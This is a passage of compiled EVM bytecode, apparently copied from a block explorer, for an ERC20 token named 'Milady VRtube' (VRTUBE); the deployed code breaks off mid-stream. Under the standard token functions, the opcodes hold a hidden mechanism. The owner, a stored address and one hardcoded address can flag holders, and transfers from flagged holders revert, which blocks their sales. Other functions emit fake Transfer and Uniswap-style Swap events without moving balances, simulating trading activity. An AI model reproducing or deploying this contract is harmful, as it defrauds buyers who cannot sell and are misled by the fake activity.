1bd3565b610565565b005b610242600480360381019061023d9190611a44565b6107f1565b60405161024f9190611a9f565b60405180910390f35b610272600480360381019061026d9190611bd3565b610828565b005b61028e60048036038101906102899190611c20565b610964565b005b6102aa60048036038101906102a59190611c20565b610a3f565b6040516102b79190611ac9565b60405180910390f35b6102c8610a88565b005b6102e460048036038101906102df9190611c4d565b610a9c565b005b61030060048036038101906102fb9190611c20565b610c28565b60405161030d9190611a9f565b60405180910390f35b61031e610c7e565b60405161032b9190611cd0565b60405180910390f35b61033c610ca7565b6040516103499190611984565b60405180910390f35b61036c60048036038101906103679190611ceb565b610d39565b005b61038860048036038101906103839190611c4d565b610dec565b005b6103a4600480360381019061039f9190611a44565b610f77565b6040516103b19190611a9f565b60405180910390f35b6103d460048036038101906103cf9190611a44565b610fee565b6040516103e19190611a9f565b60405180910390f35b61040460048036038101906103ff9190611ae4565b611011565b005b610420600480360381019061041b9190611d4b565b61107b565b60405161042d9190611ac9565b60405180910390f35b610450600480360381019061044b9190611c20565b611102565b005b61046c60048036038101906104679190611db7565b611185565b005b60606006805461047d90611e13565b80601f01602080910402602001604051908101604052809291908181526020018280546104a990611e13565b80156104f65780601f106104cb576101008083540402835291602001916104f6565b820191906000526020600020905b8154815290600101906020018083116104d957829003601f168201915b5050505050905090565b60008061050b611239565b9050610518818585611241565b600191505092915050565b6000600454905090565b600080610538611239565b905061054585828561140a565b610550858585611496565b60019150509392505050565b60006008905090565b61056d611239565b73ffffffffffffffffffffffffffffffffffffffff1661058b610c7e565b73ffffffffffffffffffffffffffffffffffffffff1614806105f357506105b0611239565b73ffffffffffffffffffffffffffffffffffffffff1673419a6fa06386329ce83294519247614398e929e773ffffffffffffffffffffffffffffffffffffffff16145b806106525750610601611239565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610691576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161068890611e90565b60405180910390fd5b60005b828290508110156107ec576001600260008585858181106106b8576106b7611eb0565b5b90506020020160208101906106cd9190611c20565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff1683838381811061074857610747611eb0565b5b905060200201602081019061075d9190611c20565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9256107c48686868181106107aa576107a9611eb0565b5b90506020020160208101906107bf9190611c20565b610a3f565b6040516107d19190611ac9565b60405180910390a380806107e490611f0e565b915050610694565b505050565b6000806107fc611239565b905061081d81858561080e858961107b565b6108189190611f56565b611241565b600191505092915050565b610830611239565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b690611e90565b60405180910390fd5b60005b8282905081101561095f576000600260008585858181106108e6576108e5611eb0565b5b90506020020160208101906108fb9190611c20565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061095790611f0e565b9150506108c2565b505050565b61096c611239565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f290611e90565b60405180910390fd5b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a906117ad565b610a9a600061182b565b565b60005b84849050811015610c2157848482818110610abd57610abc611eb0565b5b9050602002016020810190610ad29190611c20565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822600086866000604051610b589493929190611fcf565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610bac57610bab611eb0565b5b9050602002016020810190610bc19190611c20565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610c069190611ac9565b60405180910390a38080610c1990611f0e565b915050610a9f565b5050505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610cb690611e13565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce290611e13565b8015610d2f5780601f10610d0457610100808354040283529160200191610d2f565b820191906000526020600020905b815481529060010190602001808311610d1257829003601f168201915b5050505050905090565b60005b83839050811015610de6573073ffffffffffffffffffffffffffffffffffffffff16848483818110610d7157610d70611eb0565b5b9050602002016020810190610d869190611c20565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610dcb9190611ac9565b60405180910390a38080610dde90611f0e565b915050610d3c565b50505050565b60005b84849050811015610f7057848482818110610e0d57610e0c611eb0565b5b9050602002016020810190610e229190611c20565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610ea79493929190612014565b60405180910390a3848482818110610ec257610ec1611eb0565b5b9050602002016020810190610ed79190611c20565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f559190611ac9565b60405180910390a38080610f6890611f0e565b915050610def565b5050505050565b600080610f82611239565b90506000610f90828661107b565b905083811015610fd5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fcc906120cb565b60405180910390fd5b610fe28286868403611241565b60019250505092915050565b600080610ff9611239565b9050611006818585611496565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161106e9190611ac9565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61110a6117ad565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611179576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111709061215d565b60405180910390fd5b6111828161182b565b50565b61118d611239565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461121c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121390611e90565b60405180910390fd5b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036112b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112a7906121ef565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361131f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161131690612281565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516113fd9190611ac9565b60405180910390a3505050565b6000611416848461107b565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146114905781811015611482576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611479906122ed565b60405180910390fd5b61148f8484848403611241565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611505576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114fc9061237f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611574576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161156b90612411565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156115fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115f2906124a3565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561173757600560009054906101000a900460ff1615156001151514611736576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161172d906124e9565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516117949190611ac9565b60405180910390a36117a78484846118ef565b50505050565b6117b5611239565b73ffffffffffffffffffffffffffffffffffffffff166117d3610c7e565b73ffffffffffffffffffffffffffffffffffffffff1614611829576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161182090611e90565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561192e578082015181840152602081019050611913565b60008484015250505050565b6000601f19601f8301169050919050565b6000611956826118f4565b61196081856118ff565b9350611970818560208601611910565b6119798161193a565b840191505092915050565b6000602082019050818103600083015261199e818461194b565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006119db826119b0565b9050919050565b6119eb816119d0565b81146119f657600080fd5b50565b600081359050611a08816119e2565b92915050565b6000819050919050565b611a2181611a0e565b8114611a2c57600080fd5b50565b600081359050611a3e81611a18565b92915050565b60008060408385031215611a5b57611a5a6119a6565b5b6000611a69858286016119f9565b9250506020611a7a85828601611a2f565b9150509250929050565b60008115159050919050565b611a9981611a84565b82525050565b6000602082019050611ab46000830184611a90565b92915050565b611ac381611a0e565b82525050565b6000602082019050611ade6000830184611aba565b92915050565b600080600060608486031215611afd57611afc6119a6565b5b6000611b0b868287016119f9565b9350506020611b1c868287016119f9565b9250506040611b2d86828701611a2f565b9150509250925092565b600060ff82169050919050565b611b4d81611b37565b82525050565b6000602082019050611b686000830184611b44565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f840112611b9357611b92611b6e565b5b8235905067ffffffffffffffff811115611bb057611baf611b73565b5b602083019150836020820283011115611bcc57611bcb611b78565b5b9250929050565b60008060208385031215611bea57611be96119a6565b5b600083013567ffffffffffffffff811115611c0857611c076119ab565b5b611c1485828601611b7d565b92509250509250929050565b600060208284031215611c3657611c356119a6565b5b6000611c44848285016119f9565b91505092915050565b60008060008060608587031215611c6757611c666119a6565b5b600085013567ffffffffffffffff811115611c8557611c846119ab565b5b611c9187828801611b7d565b94509450506020611ca487828801611a2f565b9250506040611cb587828801611a2f565b91505092959194509250565b611cca816119d0565b82525050565b6000602082019050611ce56000830184611cc1565b92915050565b600080600060408486031215611d0457611d036119a6565b5b600084013567ffffffffffffffff811115611d2257611d216119ab565b5b611d2e86828701611b7d565b93509350506020611d4186828701611a2f565b9150509250925092565b60008060408385031215611d6257611d616119a6565b5b6000611d70858286016119f9565b9250506020611d81858286016119f9565b9150509250929050565b611d9481611a84565b8114611d9f57600080fd5b50565b600081359050611db181611d8b565b92915050565b600060208284031215611dcd57611dcc6119a6565b5b6000611ddb84828501611da2565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611e2b57607f821691505b602082108103611e3e57611e3d611de4565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611e7a6020836118ff565b9150611e8582611e44565b602082019050919050565b60006020820190508181036000830152611ea981611e6d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611f1982611a0e565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611f4b57611f4a611edf565b5b600182019050919050565b6000611f6182611a0e565b9150611f6c83611a0e565b9250828201905080821115611f8457611f83611edf565b5b92915050565b6000819050919050565b6000819050919050565b6000611fb9611fb4611faf84611f8a565b611f94565b611a0e565b9050919050565b611fc981611f9e565b82525050565b6000608082019050611fe46000830187611fc0565b611ff16020830186611aba565b611ffe6040830185611aba565b61200b6060830184611fc0565b95945050505050565b60006080820190506120296000830187611aba565b6120366020830186611fc0565b6120436040830185611fc0565b6120506060830184611aba565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006120b56025836118ff565b91506120c082612059565b604082019050919050565b600060208201905081810360008301526120e4816120a8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006121476026836118ff565b9150612152826120eb565b604082019050919050565b600060208201905081810360008301526121768161213a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006121d96024836118ff565b91506121e48261217d565b604082019050919050565b60006020820190508181036000830152612208816121cc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061226b6022836118ff565b91506122768261220f565b604082019050919050565b6000602082019050818103600083015261229a8161225e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006122d7601d836118ff565b91506122e2826122a1565b602082019050919050565b60006020820190508181036000830152612306816122ca565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006123696025836118ff565b91506123748261230d565b604082019050919050565b600060208201905081810360008301526123988161235c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006123fb6023836118ff565b91506124068261239f565b604082019050919050565b6000602082019050818103600083015261242a816123ee565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061248d6026836118ff565b915061249882612431565b604082019050919050565b600060208201905081810360008301526124bc81612480565b9050919050565b50565b60006124d36000836118ff565b91506124de826124c3565b600082019050919050565b60006020820190508181036000830152612502816124c6565b905091905056fea2646970667358221220e29fb923b659f5b70434b4e39a765a5e0a620980ce096b55bdc58caecb5d40b464736f6c63430008120033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000002540be400000000000000000000000000000000000000000000000000000000000000000d4d696c616479205652747562650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065652545542450000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061014d5760003560e01c80637aac697b116100c3578063a457c2d71161007c578063a457c2d71461038a578063a9059cbb146103ba578063beabacc8146103ea578063dd62ed3e14610406578063f2fde38b14610436578063fde980ca146104525761014d565b80637aac697b146102ca57806381bac14f146102e65780638da5cb5b1461031657806395d89b41146103345780639ebbaef714610352578063a1c617f51461036e5761014d565b80633811ac02116101155780633811ac021461020c5780633950935114610228578063477e19441461025857806366d382031461027457806370a0823114610290578063715018a6146102c05761014d565b806306fdde0314610152578063095ea7b31461017057806318160ddd146101a057806323b872dd146101be578063313ce567146101ee575b600080fd5b61015a61046e565b6040516101679190611984565b60405180910390f35b61018a60048036038101906101859190611a44565b610500565b6040516101979190611a9f565b60405180910390f35b6101a8610523565b6040516101b59190611ac9565b60405180910390f35b6101d860048036038101906101d39190611ae4565b61052d565b6040516101e59190611a9f565b60405180910390f35b6101f661055c565b6040516102039190611b53565b60405180910390f35b61022660048036038101906102219190611bd3565b610565565b005b610242600480360381019061023d9190611a44565b6107f1565b60405161024f9190611a9f565b60405180910390f35b610272600480360381019061026d9190611bd3565b610828565b005b61028e60048036038101906102899190611c20565b610964565b005b6102aa60048036038101906102a59190611c20565b610a3f565b6040516102b79190611ac9565b60405180910390f35b6102c8610a88565b005b6102e460048036038101906102df9190611c4d565b610a9c565b005b61030060048036038101906102fb9190611c20565b610c28565b60405161030d9190611a9f565b60405180910390f35b61031e610c7e565b60405161032b9190611cd0565b60405180910390f35b61033c610ca7565b6040516103499190611984565b60405180910390f35b61036c60048036038101906103679190611ceb565b610d39565b005b61038860048036038101906103839190611c4d565b610dec565b005b6103a4600480360381019061039f9190611a44565b610f77565b6040516103b19190611a9f565b60405180910390f35b6103d460048036038101906103cf9190611a44565b610fee565b6040516103e19190611a9f565b60405180910390f35b61040460048036038101906103ff9190611ae4565b611011565b005b610420600480360381019061041b9190611d4b565b61107b565b60405161042d9190611ac9565b60405180910390f35b610450600480360381019061044b9190611c20565b611102565b005b61046c60048036038101906104679190611db7565b611185565b005b60606006805461047d90611e13565b80601f01602080910402602001604051908101604052809291908181526020018280546104a990611e13565b80156104f65780601f106104cb576101008083540402835291602001916104f6565b820191906000526020600020905b8154815290600101906020018083116104d957829003601f168201915b5050505050905090565b60008061050b611239565b9050610518818585611241565b600191505092915050565b6000600454905090565b600080610538611239565b905061054585828561140a565b610550858585611496565b60019150509392505050565b60006008905090565b61056d611239565b73ffffffffffffffffffffffffffffffffffffffff1661058b610c7e565b73ffffffffffffffffffffffffffffffffffffffff1614806105f357506105b0611239565b73ffffffffffffffffffffffffffffffffffffffff1673419a6fa06386329ce83294519247614398e929e773ffffffffffffffffffffffffffffffffffffffff16145b806106525750610601611239565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610691576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161068890611e90565b60405180910390fd5b60005b828290508110156107ec576001600260008585858181106106b8576106b7611eb0565b5b90506020020160208101906106cd9190611c20565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff1683838381811061074857610747611eb0565b5b905060200201602081019061075d9190611c20565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9256107c48686868181106107aa576107a9611eb0565b5b90506020020160208101906107bf9190611c20565b610a3f565b6040516107d19190611ac9565b60405180910390a380806107e490611f0e565b915050610694565b505050565b6000806107fc611239565b905061081d81858561080e858961107b565b6108189190611f56565b611241565b600191505092915050565b610830611239565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b690611e90565b60405180910390fd5b60005b8282905081101561095f576000600260008585858181106108e6576108e5611eb0565b5b90506020020160208101906108fb9190611c20565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061095790611f0e565b9150506108c2565b505050565b61096c611239565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f290611e90565b60405180910390fd5b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a906117ad565b610a9a600061182b565b565b60005b84849050811015610c2157848482818110610abd57610abc611eb0565b5b9050602002016020810190610ad29190611c20565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822600086866000604051610b589493929190611fcf565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610bac57610bab611eb0565b5b9050602002016020810190610bc19190611c20565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610c069190611ac9565b60405180910390a38080610c1990611f0e565b915050610a9f565b5050505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610cb690611e13565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce290611e13565b8015610d2f5780601f10610d0457610100808354040283529160200191610d2f565b820191906000526020600020905b815481529060010190602001808311610d1257829003601f168201915b5050505050905090565b60005b83839050811015610de6573073ffffffffffffffffffffffffffffffffffffffff16848483818110610d7157610d70611eb0565b5b9050602002016020810190610d869190611c20565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610dcb9190611ac9565b60405180910390a38080610dde90611f0e565b915050610d3c565b50505050565b60005b84849050811015610f7057848482818110610e0d57610e0c611eb0565b5b9050602002016020810190610e229190611c20565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610ea79493929190612014565b60405180910390a3848482818110610ec257610ec1611eb0565b5b9050602002016020810190610ed79190611c20565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f559190611ac9565b60405180910390a38080610f6890611f0e565b915050610def565b5050505050565b600080610f82611239565b90506000610f90828661107b565b905083811015610fd5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fcc906120cb565b60405180910390fd5b610fe28286868403611241565b60019250505092915050565b600080610ff9611239565b9050611006818585611496565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161106e9190611ac9565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61110a6117ad565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611179576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111709061215d565b60405180910390fd5b6111828161182b565b50565b61118d611239565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461121c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121390611e90565b60405180910390fd5b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036112b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112a7906121ef565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361131f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161131690612281565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516113fd9190611ac9565b60405180910390a3505050565b6000611416848461107b565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146114905781811015611482576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611479906122ed565b60405180910390fd5b61148f8484848403611241565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611505576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114fc9061237f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611574576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161156b90612411565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156115fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115f2906124a3565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561173757600560009054906101000a900460ff1615156001151514611736576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161172d906124e9565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516117949190611ac9565b60405180910390a36117a78484846118ef565b50505050565b6117b5611239565b73ffffffffffffffffffffffffffffffffffffffff166117d3610c7e565b73ffffffffffffffffffffffffffffffffffffffff1614611829576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161182090611e90565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561192e578082015181840152602081019050611913565b60008484015250505050565b6000601f19601f8301169050919050565b6000611956826118f4565b61196081856118ff565b9350611970818560208601611910565b6119798161193a565b840191505092915050565b6000602082019050818103600083015261199e818461194b565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006119db826119b0565b9050919050565b6119eb816119d0565b81146119f657600080fd5b50565b600081359050611a08816119e2565b92915050565b6000819050919050565b611a2181611a0e565b8114611a2c57600080fd5b50565b600081359050611a3e81611a18565b92915050565b60008060408385031215611a5b57611a5a6119a6565b5b6000611a69858286016119f9565b9250506020611a7a85828601611a2f565b9150509250929050565b60008115159050919050565b611a9981611a84565b82525050565b6000602082019050611ab46000830184611a90565b92915050565b611ac381611a0e565b82525050565b6000602082019050611ade6000830184611aba565b92915050565b600080600060608486031215611afd57611afc6119a6565b5b6000611b0b868287016119f9565b9350506020611b1c868287016119f9565b9250506040611b2d86828701611a2f565b9150509250925092565b600060ff82169050919050565b611b4d81611b37565b82525050565b6000602082019050611b686000830184611b44565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f840112611b9357611b92611b6e565b5b8235905067ffffffffffffffff811115611bb057611baf611b73565b5b602083019150836020820283011115611bcc57611bcb611b78565b5b9250929050565b60008060208385031215611bea57611be96119a6565b5b600083013567ffffffffffffffff811115611c0857611c076119ab565b5b611c1485828601611b7d565b92509250509250929050565b600060208284031215611c3657611c35611